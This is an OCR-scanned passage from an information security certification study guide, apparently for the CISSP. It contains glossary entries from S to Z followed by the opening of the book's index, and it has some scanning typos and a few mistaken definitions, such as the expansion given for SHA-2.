SAML Security Assertion Markup Language, an XML-based framework for exchanging 
security information, including authentication data 
SAN Storage Area Network, provides block-level disk storage via a network 
Sanction Action taken as a result of policy violation 
Sarbanes-Oxley Act See — SOX 

Sashimi Model Development model with highly overlapping steps; it can be thought of as a 
real-world successor to the Waterfall Model 
Savepoint A clean snapshot of the database tables 
Schema Describes the attributes and values of the database tables 

Scoping The process of determining which portions of a standard will be employed by an 
organization 

Screened host architecture Older flat network design using one router to filter external traf- 
fic to and from a bastion host via an ACL 
Screened subnet architecture Two firewalls screening a DMZ 

Script kiddies Attackers who target computer systems with tools they have little or no 
understanding of 

Scrum Agile development model that uses small teams, roles include Scrum Master and 
Product Owner 

Scrum Master Senior member of the organization who acts as a coach for the Scrum team 
SDLC (Applications) Systems Development Life Cycle, a system development model that 
focuses on security in every phase 

SDLC (Telecommunications) Synchronous Data Link Control, a synchronous layer 2 WAN 
protocol that uses polling to transmit data 

SDN Software Defined Networking, separates a router’s control plane from the data (for- 
warding) plane. Routing decisions are made remotely, instead of on each individual router 
SDSL Symmetric Digital Subscriber Line, DSL with matching upload and download speeds 
Search warrant Court order that allows a legal search 

Secondary evidence Evidence consisting of copies of original documents and oral descrip- 
tions 

Secure Hash Algorithm 1 See — SHA-1 
Secure Hash Algorithm 2 See — SHA-2 
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Secure Real-time Transport Protocol See — SRTP 

Secure Shell See— SSH 

Secure Sockets Layer See — SSL 

Secure/Multipurpose Internet Mail Extensions See — S/MIME 
Security Assertion Markup Language See — SAML 

Security assessments A holistic approach to assessing the effectiveness of access control. 

May use other tests as a subset, including penetration tests and vulnerability scans 
Security audit A test against a published standard 
Security domain The list of objects a subject is allowed to access 

Security Parameter Index See — SPI 

Security Safeguards Principle OECD Privacy Guideline principle that states personal data 
should be reasonably protected against unauthorized use, disclosure, or alteration 
Segment Layer 4 PDU 

Semantic integrity Requires that each value is consistent with the attribute data type 
Separation of duties Dividing sensitive transactions among multiple subjects 

Serial Line Internet Protocol See — SLIP 

Server-side attack Attack launched directly from an attacker to a listening service. Also 
called service-side attack 

Service Level Agreement See — SLA 
Service Set Identifier See — SSID 

Servicemark Intellectual property protection that allows for the creation of a brand that dis- 
tinguishes the source of services 
Session hijacking Compromise of an existing network sessions 

Session Initiation Protocol See — SIP 

Session layer Layer 5 of the OSI model, manages sessions, which provide maintenance on 
connections 

SHA-1 Secure Hash Algorithm 1, a hash function that creates a 160-bit message digest 
SHA-2 Secure Hash Algorithm 1, a hash function that includes SHA-224, SHA-256, SHA- 
384, and SHA-512, named after the length of the message digest each creates 
Shadow database Similar to a replicated database, with one key difference: a shadow data- 
base mirrors all changes made to a primary database, but clients do not access the shadow 
Shareware Fully functional proprietary software that may be initially used free of charge. If 
the user continues to use the Shareware for a specific period of time, the shareware license 
typically requires payment 
Shielded Twisted Pair See — STP 

Shoulder surfing Physical attack where an attacker observes credentials, such as a key com- 
bination 

Shredding See — Wiping 

Side-channel attack Cryptographic attack which uses physical data to break a cryptosystem, 
such as monitoring CPU cycles or power consumption used while encrypting or decrypting 
SIGABA Rotor machine used by the United States through World War II into the 1950s 
Simple integrity axiom Biba property that states “no read down” 

Simple Mail Transfer Protocol See — SMTP 
Simple Network Management Protocol See — SNMP 

Simple Security Property Bell-LaPadula property that states “no read up” (NRU) 

Simplex One-way communication, like a car radio tuned to a music station 
Simulation test Recovery from a pretend disaster, goes beyond talking about the process and 
actually has teams carry out the recovery process 
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Single Loss Expectancy See — SLE 
Single Sign-On See — SSO 

SIP Session Initiation Protocol, a VoIP signaling protocol 

SLA Service Level Agreement, contractual agreement that helps assure availability 
Slack space Space on a disk between the end-of-file marker, and the end of the cluster 
SLE Single Loss Expectancy, the cost of a single loss 

SLIP Serial Line Internet Protocol, a Layer 2 protocol which provides IP connectivity via 
asynchronous connections such as serial lines and modems 
Smart card A physical access control device containing an integrated circuit. Also known as 
an Integrated Circuit Card (ICC) 

SMDS Switched Multimegabit Data Service, an older WAN technology that is similar to 
ATM 

SMTP Simple Mail Transfer Protocol, a store-and-forward protocol used to exchange email 
between servers 

Smurf attack Attack using an ICMP flood and directed broadcast addresses 
Sniffing Confidentiality attack on network traffic 

SNMP Simple Network Management Protocol, used to monitor network devices 
SOAP Originally stood for Simple Object Access Protocol, now simply “SOAP”. Used to 
implement web services 

Social engineering Uses the human mind to bypass security controls 
Socket A combination of an IP address and a TCP or UDP port on one node 
Socket pair Describes a unique connection between two nodes: source port, source IP, desti- 
nation port and destination IP 
SOCKS Popular circuit-level proxy 
Software as a Service See — SaaS 
Software Defined Networking See — SDN 
Software escrow Source code held by a neutral third party 
Software piracy Unauthorized copying of copyrighted software 
Solid State Drive See — SSD 

SONET Synchronous Optical Networking, carries multiple T-carrier circuits via fiber optic 
cable 

Source code Computer programming language instructions that are written in text that must 
be translated into machine code before execution by the CPU 
Southbridge Connects input/output (I/O) devices, such as disk, keyboard, mouse, CD drive, 
USB ports, etc 

SOX Sarbanes-Oxley Act of 2002, created regulatory compliance mandates for publicly 
traded companies 

SPAN port Switched Port Analyzer, receives traffic forwarded from other switch ports 
Spear phishing Targeted phishing attack against a small number of high-value victims 
SPI Security Parameter Index, used to identify simplex IPsec security associations 
Spiral Model Software development model designed to control risk 

Split horizon Distance vector routing protocol safeguard will not send a route update via an 
interface it learned the route from 
Spoofing Masquerading as another endpoint 

Spring-bolt lock A locking mechanism that “springs” in and out of the doorjamb 
SQL Structured Query Language, the most popular database query language 
SRAM Static Random Access Memory, expensive and fast memory that uses small latches 
called “flip-flops” to store bits 
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SRTP Secure Real-time Transport Protocol, used to provide secure VoIP 
SSD Solid State Drive, a combination of flash memory (EEPROM) and DRAM 
SSH Secure Shell, a secure replacement for Telnet, FTP and the UNIX “R” commands 
SSID Service Set Identifier, acts as a wireless network name 

SSL Secure Sockets Layer, authenticates and provides confidentiality to network traffic such 
as web traffic 

SSO Single Sign-On, allows a subject to authenticate once, and then access multiple systems 
Standard Describes the specific use of technology, often applied to hardware and software, 
administrative control 

Star Physical network topology that connects each node to a central device such as a hub or 
a switch 

Stateful firewall Firewall with a state table that allows the firewall to compare current pack- 
ets to previous 

Static password Reusable passwords that and may or may not expire 
Static Random Access Memory See — SRAM 
Static route Fixed routing entries 

Static testing Tests code passively: the code is not running 
Statutory damages Damages prescribed by law 

Stealth virus Virus that hides itself from the OS and other protective software, such as anti- 
virus software 

Steganography The science of hidden communication 
Storage Area Network See — SAN 

Storage channel Covert channel that uses shared storage, such as a temporary directory, to 
allow two subjects to signal each other 

STP Shielded Twisted Pair, network cabling that contains additional metallic shielding 
around each twisted pair of wires 

Strike plate Plate in the doorjamb with a slot for a deadbolt or spring-bolt lock 
Striping Spreading data writes across multiple disks to achieve performance gains, used by 
some levels of RAID 

Strong authentication Requires that the user present more than one authentication factor. 
Also called dual-factor authentication 

Strong tranquility property Bell-LaPadula property that states security labels will not 
change while the system is operating 

Structured Query Language See — SQL 

Structured walkthrough Thorough review of a DRP by individuals that are knowledge- 
able about the systems and services targeted for recovery. Also known as tabletop 
exercise 

Subject An active entity on an Information System which accesses or changes data 
Substitution Cryptographic method that replaces one character for another 
SVC Switched Virtual Circuit, a circuit that is established on demand 

Swapping Uses virtual memory to copy contents in primary memory (RAM) to or from sec- 
ondary memory 

Switch Layer 2 device that carries traffic on one LAN 

Switched Multimegabit Data Service See — SMDS 
Symmetric Digital Subscriber Line See — SDSL 

Symmetric Encryption Encryption that uses one key to encrypt and decrypt 
Synthetic transactions Also called synthetic monitoring, involves building scripts or tools 
that simulate activities normally performed in an application 
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System owner A manager responsible for the actual computers that house data. This includes 
the hardware and software configuration, including updates, patching, etc 
SYN TCP flag, synchronize a connection 

SYN Flood Resource exhaustion DoS attack that fills a system’s half-open connection table 

Synchronous Data Link Control See — SDLC 

Synchronous Dynamic Token Use time or counters to synchronize a displayed token code 
with the code expected by the authentication server 

Synchronous Optical Networking See — SONET 

System call Allow processes to communicate with the kernel and provide a window between 
CPU rings 

System unit Computer case, containing all of the internal electronic computer components, 
including motherboard, internal disk drives, power supply, etc 
Systems Development Life Cycle See — SDLC 

T1 A dedicated 1.544 megabit circuit that carries 24 64-bit DSO channels 
T3 28 Bundled Tls 

Table A group of related data in a relational database 
Tabletop exercise See — Structured walkthrough 

TACACS Terminal Access Controller Access Control System, a SSO method often used for 
network equipment 

Tailgating Following an authorized person into a building without providing credentials. 
Also known as piggybacking 

Tailoring The process of customizing a standard for an organization 

Take-Grant Protection Model Determines the safety of a given computer system that fol- 
lows specific rules 

TAP Test Access Port, provides a way to “tap” into network traffic and see all unicast streams 
on a network 

TCP Transmission Control Protocol, uses a 3-way handshake to create reliable connections 
across a network 

TCP/IP model A network model with four layers: network access, Internet, transport and 
application 

TCSEC Trusted Computer System Evaluation Criteria, aka the Orange Book, evaluation 
model developed by the United States Department of Defense 
Teardrop attack A malformed packet DoS attack that targets issues with systems’ fragmen- 
tation reassembly 

Technical controls Implemented using software, hardware, or firmware that restricts logical 
access on an information technology system 
Telnet Protocol that provides terminal emulation over a network using TCP port 23 
TEMPEST A standard for shielding electromagnetic emanations from computer equipment 

Temporal Key Integrity Protocol See — TKIP 

Terminal Access Controller Access Control System See — TACACS 

TFTP Trivial File Transfer Protocol, a simple way to transfer files with no authentication or 
directory structure 

TGS Ticket Granting Service, a Kerberos service which grants access to services 
TGT Ticket Granting Ticket, Kerberos credentials encrypted with the TGS’ key 
Thicknet Older type of coaxial cable, used for Ethernet bus networking 
Thin client applications Use a web browser as a universal client, providing access to 
robust applications that are downloaded from the thin client server and run in the client’s 
browser 
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Thin clients Simple computer systems that rely on centralized applications and data 
Thinnet Older type of coaxial cable, used for Ethernet bus networking 
Thread A lightweight process (LWP) 

Threat A potentially negative occurrence 

Threat agents The actors causing the threats that might exploit a vulnerability 
Threat vectors Vectors which allow exploits to connect to vulnerabilities 
Throughput The process of authenticating to a system (such as a biometric authentication 
system) 

Ticket Data that authenticates a Kerberos principal’s identity 
Ticket Granting Service See — TGS 
Ticket Granting Ticket See — TGT 

Time multiplexing Shares (multiplexes) system resources between multiple processes, each 
with a dedicated slice of time 

Time of Check/Time of Use See— TOCTOU 

Timing channel Covert channel that relies on the system clock to infer sensitive information 
TKIP Temporal Key Integrity Protocol, used to provide integrity by WPA 
TLS Transport Layer Security, the successor to SSL 
TNI Trusted Network Interpretation, the Red Book 

TOCTOU Time of Check/Time of Use, altering a condition after it has been checked by the 
operating system, but before it is used 
Token Ring Legacy LAN technology that uses tokens 

Top-Down programming Starts with the broadest and highest level requirements (the con- 
cept of the final program) and works down towards the low-level technical implementation 
details 

Total Cost of Ownership The cost of a safeguard 

TPM Trusted Platform Module, a processor that can provide additional security capabilities 
at the hardware level, allowing for hardware-based cryptographic operations 
Traceability Matrix Maps customers’ requirements to the software testing plan: it “traces” 
the “requirements,” and ensures that are being met 
Traceroute Command that uses ICMP Time Exceeded messages to trace a network route 
Trade secret Business-proprietary information that is important to an organization's ability 
to compete 

Trademark Intellectual property protection that allows for the creation of a brand that 
distinguishes the source of products 
Training Security control designed to provide a skill set 

Transmission Control Protocol See — TCP 

Transport layer (OSI) Layer 4 of the OSI model, handles packet sequencing, flow control 
and error detection 

Transport layer (TCP/IP) TCP/IP model layer that connects the internet layer to the 
application Layer 

Transport Layer Security See — TLS 
Transposition See — Permutation 

Tree Physical network topology with a root node, and branch nodes that are at least three 
levels deep 

Triple DES 56-bit DES applied three times per block 

Trivial File Transfer Protocol See — TFTP 

Trojan Malware that performs two functions: one benign (such as a game), and one mali- 
cious. Also called Trojan Horses 
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Trusted Computer System Evaluation Criteria See — TCSEC 
Trusted Network Interpretation See — TNI 
Trusted Platform Module See — TPM 

Truth table Table used to map all results of a mathematical operation, such as XOR 
Tuple A row in a relational database table 

Ttirnstile Device designed to prevent tailgating by enforcing a “one person per authentication” 
rule 

Twofish AES finalist, encrypting 128-bit blocks using 128 through 256 bit keys 

Type 1 authentication Something you know 

Type 2 authentication Something you have 

Type 3 authentication Something you are 

Type I error See — FRR 

Type II error See — FAR 

Typosquatting Registering Internet domain names comprised of likely misspellings or 
mistyping of legitimate domain trademarks 
UDP User Datagram Protocol, a simpler and faster cousin to TCP 
Ultrasonic motion detector Active motion detector that uses ultrasonic energy 
Unallocated space Portions of a disk partition which do not contain active data 
Unicast One-to-one network traffic, such as a client surfing the web 

Unit Testing Low-level tests of software components, such as functions, procedures or objects 
Unshielded Twisted Pair See — UTP 
URG TCP flag, packet contains urgent data 

USA PATRIOT Act Uniting and Strengthening America by Providing Appropriate Tools 
Required to Intercept and Obstruct Terrorism Act of 2001 
Use Limitation Principle OECD Privacy Guideline principle that states personal data should 
never be disclosed without either the consent of the individual or legal requirement 
User Datagram Protocol See — UDP 

UTP Unshielded twisted pair, network cabling that uses pairs of wire twisted together 
VDSL Very High Rate Digital Subscriber Line, DSL featuring much faster asymmetric speeds 
Vernam Cipher One-time pad using a teletypewriter, invented by Gilbert Vernam 

Very High Rate Digital Subscriber Line See — VDSL 

Vigenere Cipher Polyalphabetic cipher named after Blaise de Vigenere, using a Vigenere 
Square 

Virtual memory Provides virtual address mapping between applications and hardware 
memory 

Virtual Private Network See — VPN 

Virtualization Adds a software layer between an operating system and the underlying 
computer hardware 

Virus Malware that requires a carrier to propagate 
Vishing Phishing via voice 

VLAN LAN, which can be thought of as a virtual switch 

Voice over Internet Protocol See — VoIP 

Voice print Biometric control that measures the subject’s tone of voice while stating a 
specific sentence or phrase 

VoIP Voice over Internet Protocol, carries voice via data networks 

VPN Virtual Private Network, a method to send private data over insecure network, such as 
the internet 

Vulnerability A weakness in a system 
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Vulnerability management Management of vulnerability information 
Vulnerability scanning A process to discover poor configurations and missing patches in an 
environment 

Walkthrough drill See — simulation test 

WAN Wide Area Network, typically covering cities, states, or countries 
WAP Wireless Application Protocol, designed to provide secure web services to handheld 
wireless devices such as smart phones 

War dialing Uses modem to dial a series of phone numbers, looking for an answering modem 
carrier tone 

Warded lock Preventive device that turn a key through channels (called wards) to unlock 
Warm site A backup site with all necessary hardware and connectivity, and configured com- 
puters without live data 

Wassenaar Arrangement Munitions law that followed COCOM, beginning in 1996 
Watchdog timer Recovers a system by rebooting after critical processes hang or crash 
Waterfall Model An application development model that uses rigid phases; when one phase 
ends, the next begins 

WSDL Web Services Description Language, provides details about how Web Services are to 
be invoked 

Weak tranquility property Bell-LaPadula property that states security labels will not change 
in a way that violates security policy 

Web Services Description Language See — WDSL 

Well-formed transactions Clark- Wilson control to enforce control over applications 
WEP Wired Equivalent Privacy, a very weak 802. 1 1 security protocol 
White box software testing Gives the tester access to program source code, data structures, 
variables, etc 

White hat Ethical hacker or researcher 

Whole Disk Encryption See — FDE 
Wide Area Network See — WAN 
Wi-Fi Protected Access See — WPA 
Wi-Fi Protected Access 2 See — WPA2 

Wiping Writes new data over each bit or block of file data. Also called shredding 

Wired Equivalent Privacy See — WEP 
Wireless Application Protocol See — WAP 
WLAN Wireless Local Area Network 

Work factor The amount of time required to break a cryptosystem (decrypt a ciphertext with- 
out the key) 

Work Recovery Time See — WRT 
Worm Malware that self-propagates 

WORM Write Once Read Many, memory which can be written to once, and read many 
times 

WPA Wi-Fi Protected Access, a partial implementation of 802. lli 
WPA2 Wi-Fi Protected Access 2, the full implementation of 802. 1 1 i 
Write Once Read Many See — WORM 

WRT Work Recovery Time, the time required to configure a recovered system 
X.25 Older packet switched WAN protocol 

XML Extensible Markup Language, a markup language designed as a standard way to encode 
documents and data 

XOR Exclusive OR, binary operation that is true if one of two inputs (but not both) are true 
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XP Extreme Programming, an Agile development method that uses pairs of programmers 
who work off a detailed specification 

XSS Cross Site Scripting, third-party execution of web scripting languages such as JavaScript 
within the security context of a trusted site 

Zachman Framework Provides 6 frameworks for providing information security, ask- 
ing what, how, where, who, when and why, and mapping those frameworks across rules 
including planner, owner, designer, builder, programmer and user 

Zero knowledge test A blind penetration test where the tester has no inside information at 
the start of the test 

Zero-day exploit An exploit for a vulnerability with no available vendor patch 

Zombie See — Bot 
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2TDES EDE, 165 
3TDES EDE, 165 

4GL (fourth-generation programming languages), 
433 

802, IX, 146, 278-280 

802, 11,260-261 

802, 11 A, 260 

802, 1 lAc, 260 

802, 11 B, 260 

802, 11G, 260 

802, 111, 259, 262 

802, 1 IN, 260 

802, 11-1997,260 

9 Step process, risk analysis, 67-68 

A 

ABM (Asynchronous Balanced Mode), HDLC, 256 
Abstraction, secure design concepts, 1 17 
Academy Award watermarks, 183 
Acceptance of risk, 65 
Acceptance testing, software, 337, 467^468 
Accepted practices, customary law, 21 
Access aggregation, 311-312 
Access audits, 311-312 
Access control, 55-58, 293-327 
account lockouts, 296 
administrative security, 348-352 
architecture, 128-131 
authentication methods, 294-309 
Bell-LaPadula model, 106 
Biba model, 107-108 
biometrics, 304-308 
centralized, 309 
Chinese Wall model, 109 
Clark-Wilson, 108-109 
clipping levels, 295-296 
contactless cards, 191, 262-263 
content-/context-dependent, 323 
credential management systems, 313 
Data Loss Prevention, 367-368 
decentralized, 309-310 
defensive categories and types, 55-58 
Diameter, 279-280, 319 
discretionary, 321 
endpoint security 

exam objective summary, 323-324 
Federated Identity Management, 312 


Graham-Denning model, 111-112 

Harrison-Ruzzo-Ullman model, 1 12 

honeypots & honeynets, 370-37 1 

Identity as a Service, 312-313 

IDS and IPS, 364-366 

information flow model, 109 

integrity models, 106-109 

KERBEROS, 314-318 

lattice-based, 106-107 

LDAP, 314 

location-based, 309 

log reviews, 333-335 

mandatory, 128, 293, 321, 349 

Microsoft Active Directory Domains, 320 

models, 104-113, 321-323 

modes of operation, 112-113 

non-discretionary, 321-323 

noninterference model, 109-110 

PAP & CHAP, 278, 320 

passwords and keys, 294-301 

penetration testing, 44-45, 330-333 

perimeter defenses, 183-196 

preventative controls, 55-56 

privilege, 104-105, 129-131, 321-323, 349 

protocols and frameworks, 3 1 8-320 

provisioning lifecycles, 311-312 

RADIUS, 318-319 

reading up and writing down, 104-105 
role-based, 293, 321-323 
rule-based, 323 
salts, 300 

security assessments and audits, 332-333 
self test, 324-326, 499-504 
SESAME, 318 

Single Sign-On, 309, 310-311 
TACACS & TACACS+, 319 
Take-Grant Protection Model, 1 10 
technologies, 309-320 
tokens, 301-303 
Zachman Framework, 111 
Access Control Lists. See ACL 
Access control matrices, 110-112 
Access reviews, 311-312 
Accountability 

centralized access control, 309 
cornerstone concepts, 16-17 
OECD privacy guidelines, 37 
RADIUS, 318-319 
TACACS & TACACS+, 319 
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Account lockouts, 296 
Accreditation, 92-93, 113-115 
ACK flags, 238-239 
ACL (Access Control Lists), 275 
Acquired software, security impact assessment, 
468-469 

Acquisitions, security issues, 45 — 46 

Activation of disaster recovery teams, 393 

Active-active clusters, 382, 416 

Active Directory Domains, 320 

Active entities, subjects and objects, 18 

Active-passive clusters, 382, 416 

Active RFID tags, 262-263 

ActiveX controls, 141, 460 

Adaptive chosen ciphertext attacks, 173-174 

Adaptive chosen plaintext attacks, 173 

Addressing 

ARP and RARP, 227, 235-236 
directed broadcasts, 236 
IPv4, 228-229, 233-234 
IPv6, 227, 229-232 
MAC, 223, 225, 227, 230-231, 261 
Network Interface Cards, 227 
RFC 1918, 233-234 
translation, 234-235 
Address Resolution Protocol. See ARP 
Address space layout randomization. See ASLR 
AddRoundKey, AES, 167 
Ad hoc mode, 802, 1 1, 261 
Adjacent buildings, 197-198 
Administrative controls, 348-352 
Administrative law, concepts, 23 
ADSL (Asymmetric Digital Subscriber Line), 
properties, 283 

Advanced Encryption Standard. See AES 
AES (Advanced Encryption Standard), 165-168, 
181,262 

Agents of law enforcement, reasonable searches, 
28-29 

Aggregation, databases, 143-144 
Agile Software Development, 439-441 
AH (Authentication Headers), IPSEC, 179-181 
Airborne contaminants, 203 
Air conditioning. See HVAC 
ALE (Annualized Loss Expectancy), risk 
analysis, 60-64 
Algorithms, genetic, 472 
Allocated space, forensics, 353 
All pair testing, 338 

Alteration, cornerstone concepts, 13-14 
ALU (arithmetic logic unit), 120 
AMD-V (AMD Virtualization), 118 
AMP (asymmetric multiprocessing), 122 


Analog communications, 221 
Analysis 

Bayesian filtering, 471-472 
forensics, 352-357 
software tests, 339-340 
Analytics, database security issues, 144 
ANN (Artificial Neural Networks), 470-471 
Annualized Loss Expectancy. See ALE 
Annual Rate of Occurrence. See ARO 
Anomaly Detection Intrusion Detection 
Systems, 366 

Antivirus software, 139, 368-369 
Apache licenses, 435^-36 
APIs (Application Programming Interfaces), 
security, 449 

Applets, vulnerabilities, 141 
Application Layer 
Layer 7 of OSI model, 224, 274 
TCP/IP model, 226, 241-245 
Application-layer proxy firewalls, 274 
Application Programming Interfaces. See APIs 
Applications. See Software 
Application virtualization, remote access, 284-285 
Architecture 
CPUs, 120-123 

Data Execution Prevention, 126-127 
instruction sets, 122-123 
internet, vulnerabilities, 140-142 
IPsec, 281-282 
memory addressing, 123 
memory protection, 123-126 
motherboards, 119-120 
networks, 220-263 

secure operating systems and software, 127-131 
secure system hardware, 119-127, 182 
trusted platform modules, 126 
Archive bits, backup storage, 378 
ARCNET (Attached Resource Computer 
Network), 249 

Arithmetic logic unit. See ALU 
ARM (Asynchronous Response Mode), HDLC, 256 
ARO (Annual Rate of Occurrence), risk analysis, 62 
ARP (Address Resolution Protocol), 227, 235-236 
ARPAnet, 222 

Artificial Intelligence, 469-472 
Artificial Neural Networks. See ANN 
AS (Authentication servers), 279-280, 310-311 
ASLR (Address Space Layout Randomization), 
126-127 

Assemblers, 430-431 
Assessments 

access control security, 332-334 
disaster recovery, 393 
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Asset security, 81-102 
business continuity planning, 398-399, 400 
classifications, 82-85 
compartments, 82-83 
configuration, 371-373 
data destruction, 90-92 
data in motion and at rest, 96-98, 149, 
277-287 

data security controls, 92-98 
exam objectives, 98 
memory and remanence, 81, 87-91 
ownership, 85-87 
risk analysis, 58 
security operations, 371-375 
self test, 98-100, 484-489 
sensitive information media, 84-85 
Asset tracking, 199 
Asset Value. See AV 
Assignment of privileges, 17-18, 55-56 
Asymmetric Digital Subscriber Line. See ADSL 
Asymmetric encryption, 103, 168-170, 179 
Asymmetric multiprocessing. See AMP 
Asynchronous Balanced Mode. See ABM 
Asynchronous dynamic tokens, 303 
Asynchronous Response Mode. See ARM 
Asynchronous Transfer Mode. See ATM 
ATA Data Set Management Command, 

TRIM, 89-90 

ATA Secure Erase, SSDs, 90 

ATM (Asynchronous Transfer Mode), 255 

Attached Resource Computer Network. 

See ARCNET 

Attestation, service provider security, 44 
Attributes, relational databases, 45 1 
Attribute Value Pairs. See AVPs 
Attribution, computer crimes, 3 1 
Audits, security and access entitlements, 44-45, 
311-312, 332 
Authentication 

802, IX and EAP, 278-280 
access control 
methods, 294-309 
technologies, 309-320 
account lockouts, 296 
biometrics, 304-308 
brute-force attacks, 299-300 
callback, 283 

centralized access control, 309-3 1 1 
clipping levels, 295-296 
cryptography, 146-147 
dictionary attacks, 297-299 
hybrid attacks, 300 
identities, 15-16 


KERBEROS, 314-318 
LDAP, 314 

location-based access control, 309 
management of passwords, 300-301 
non-repudiation, 17, 146-147 
PAP and CHAP, 278, 320 
passwords and keys, 294-301 
protocols and frameworks, 278-280 
RADIUS, 318-319 
salts, 300 
SESAME, 318 
TACACS & TACACS+, 319 
tokens, 301-303 
Authentication Headers. See AH 
Authentication servers. See AS 
Authenticators, EAP, 279 
Authorization 

centralized access control, 309 
cornerstone concepts, 16-18 
least privilege, 17-18, 349 
Linux files, 16-17 
need to know, 17-18, 84, 349 
RADIUS, 318-319 
TACACS & TACACS+, 319 
Authorization creep, 311-312 
Autoconfiguration, IPv6, 227, 229-232 
Automated call trees, 410-411, 420 
Autorun, disabling, 369-370 
Availability 
backups, 412-417 
breaches, 84-85 
cornerstone concepts, 11, 12-15 
fault tolerance, 376-382 
hardcopy records, 413^4-14 
Highly Available clusters, 253-254, 382, 416 
memory protection, 123-126 
personnel, 391 
software escrow, 4 1 6-4 1 7 
WLANs, 259 
AV (Asset Value), 61-64 
Avoidance, risks, 66 

AVPs (Attribute Value Pairs), RADIUS, 319 
Awareness, training of personnel, 52, 419^-20 

B 

Backdoors, 137, 463, 465^166 
Background checks, 52-53, 352 
Backup power, 388-389 
emergency training, 419 
generators, 197, 201, 419 
redundant supplies, 382 
UPSs, 197, 201,388-389 
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Backup storage 
archive bits, 378 
availability, 412-417 
databases, 456 
fault tolerance, 376-381 
hardcopy records, 413—414 
offsite, 97-98 
RAID, 378-381 
sensitive information, 84-85 
storage and transportation, 84, 97-98 
tape rotation, 415 

types of policies, 377-378, 414-415 
Backward chaining, 469-470 
“Bad” blocks/clusters/sectors, forensics, 354 
Bands of the electromagnetic spectrum, 259 
Bandwidth, packet-switched networks, 222 
Baseband networks, concepts, 220 
Baselining, 44, 51-52, 371-372 
Basic Input Output System. See BIOS 
Basic Rate Interface. See BRI 
Bastion hosts, 274 
Bayesian filtering, 471-472 
BCI (Business Continuity Institute), Good Practice 
Guide, 423 

BCP (Business Continuity Planning), 347, 348, 
383-424 

Business Impact Analysis, 399^-03 
call trees, 409 — 4 1 1, 420 
change management, 420 
continued maintenance, 420-421 
Crisis Management Plans, 409-41 1 
critical state assessment, 398-399 
development of approach, 394—412 
disasters or disruptive events, 385-392 
Executive Succession Planning, 41 1-412 
failure and recovery metrics, 401-403 
frameworks, 421-423 
mistakes, 421 
plan approval, 412 
principles, 383-384 
project initiation, 395-398 
project managers, 397 
reciprocal agreements, 406-407 
recovery strategy development, 403-407 
related plans, 407—412 
relationship with DRP, 384-385 
scoping, 398 
secondary sites, 405—407 
subscription services, 407 
team building, 397-398 
version control, 42 1 
vital records storage, 411 
Becoming a CISSP, 4 


Bell-LaPadula model of access control, 106 

Berkeley Software Distribution. See BSD 

Best evidence rule, 26 

Best practice, 21, 24 

BGP (Border Gateway Protocol), 271 

BIA (Business Impact Analysis), 399-403 

Biba model of access control, 107-108 

Big Bang testing, 337 

Binary images, 353 

Biometrics, 304-308 

BIOS (Basic Input Output System), 88-89, 
125-126, 128 
Birthday attacks, 175-176 
Biting codes, keys, 188-189 
Black box tests, 330, 336 
Black hats, 69, 331 
Block ciphers, 160 
Block level striping, 380-381 
Blowfish, 168 
Bluetooth, WLANs, 262 
Bollards, 184-185 
Book ciphers, 154 
Boot integrity, TPM, 126 
BOOTP (Bootstrap Protocol), 135, 245 
Boot sector viruses, 138 
Border Gateway Protocol. See BGP 
Botnets, 72 
Bots, 72 

Bottom-Up programming, 434 
Bounds checking, 463-464 
Breaches 

availability, 84-85 
confidentiality, 84 
HIPAA, 54-55 
integrity, 84-85 
US notification laws, 43 
Brewer-Nash. See Chinese Wall model 
BRI (Basic Rate Interface), ISDN, 282 
Bridges, networks, 263-264 
Broadband networks, 220 
Broadcast traffic, 236-237 

BRP (Business Recovery Plans), 408, 412^-17. See 
also BCP (Business Continuity Planning); 
DRP (Disaster Recovery Planning) 
Brute-force attacks, 171-172, 190, 299-300 
BS-25999 standards, 422-423 
BSD (Berkeley Software Distribution), 435^-36 
Budgeting, risk analysis, 64-65 
Buffer overflows, software development, 463-464 
Buildings 

adjacent and shared, 197-198 
environmental controls, 200-211 
evacuations, 204-205 
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fire suppression, 205-2 1 1 
heat, smoke and flame detectors, 203-204 
HVAC, 202-203 
perimeter defenses, 183-196 
site configuration and design, 197-199 
site selection, 196-197 
Burden of proof, 22-23 
Buses, LANs, 250-251 
Business Continuity Institute. See BCI 
Business Continuity Planning. See BCP 
Business Impact Analysis. See BIA 
Business interruption testing, Disaster Recovery 
Plans, 419 

Business Owners, information security, 85 
Business Recovery Plans. See BRP 
Business travel, 205 
Bytecode, 43 1 

C 

Cable modems, 283 
Cabling 

EMI, 201-202 
networks, 223, 245-248 
thicknet/thinnet, 247, 248 
UTP, 201-202, 220, 246-247 
wiring closets, 198 
Cache memory, 87-88 
Caesar Cipher, 150-151 
Calculation 
ALE, 60-62 
risks, 59-60 
TCO, 62-63 

California Senate Bill 1386. See SB 1386 
Callback, authentication, 283 
Caller ID services, 283-284 
Call trees, 409-411,420 
Candidate Information Bulletin. See CIB 
Candidate keys, relational databases, 45 1 
Canons, the (ISC) 2 ® Code of Ethics, 47-48 
Capability Maturity Model. See CMM 
Capacitors, RAM, 88 
Carbon dioxide. See CO 2 
Carrier Sense Multiple Access. See CSMA 
Carrier Sense Multiple Access with Collision 
Detection. See CSMA/CD 
CAs (Certification Authorities), PKI, 178 
CASE (Computer-Aided Software 
Engineering), 434 
Categories of cabling, 246 
CBC (Cipher Block Chaining), DES, 163 
CBC-MAC (Cipher Block Chaining Message 
Authentication Codes), 177 


CBK (Common Body of Knowledge), 2 
CBT (Computer Based Testing), 5 
CCB (Configuration Control Boards), 450 
CCD (Charged Couple Discharge) Cameras, 185-186 
CCMP (Counter Mode CBC MAC Protocol), 262 
CCTV (Closed Circuit Television), 185-187 
CDI (constrained data items), Clark-Wilson, 108 
CDN (Content Distribution Networks), 287 
CD-Rs (Compact Discs - Recordable), 92 
Ceilings, design, 194-195 
Centralized access control, 309-3 1 1 
Centralized logging, reviews, 334-335 
Central Processing Unit. See CPU 
CEO (Chief Executive Officers), BCP/DRP 
development, 395-397 

CER (Crossover Error Rate), biometrics, 293, 
305-306 

Certificate Revocation Lists. See CRL 
Certification 

Clark-Wilson, 108-109 
data security, 92-93 
system security, 113-1 15 
Certification Authorities. See CAs 
CFB (Cipher Feedback), DES, 163 
CFO (Chief Financial Officers), BCP/DRP 
development, 395-397 
Chain of custody, 27, 29, 297 
Chaining, symmetric encryption, 161 
Challenge-Handshake Authentication Protocol. 

See CHAP 

Challenge-response tokens, 303 

Change management, 373-375, 420, 449^450 

Channels 

broadband networks, 220 
covert, 109-110 

Channel Service Unit/Data Service Unit. See CSU/ 
DSU 

CHAP (Challenge-Handshake Authentication 
Protocol), 278, 320 

